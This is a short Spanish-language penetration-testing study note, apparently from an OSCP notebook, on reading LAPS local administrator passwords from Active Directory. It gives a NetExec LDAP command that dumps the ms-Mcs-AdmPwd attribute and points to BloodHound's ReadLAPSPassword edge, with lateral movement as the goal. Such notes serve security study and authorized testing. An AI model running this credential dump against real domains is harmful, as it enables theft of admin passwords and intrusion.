# LAPS > Local Administrator Password Solution: rota la pass del admin local y la guarda en un atributo del objeto-equipo en AD. Si tu usuario **puede leer ese atributo**, tienes el admin local. Camino de Active Directory. ## Leer la password ```bash nxc ldap IP -u usuario -p password --module laps # o: nxc ldap IP -u usuario -p password -M laps ``` - El atributo es `ms-Mcs-AdmPwd` (LAPS v1). ## Cómo saber quién puede leerlo BloodHound muestra `ReadLAPSPassword` como arista → relacionado con ACL abuses. ## Resultado Password de admin local de esa máquina → Movimiento lateral / RDP. Relacionado: BloodHound · OSCP MOC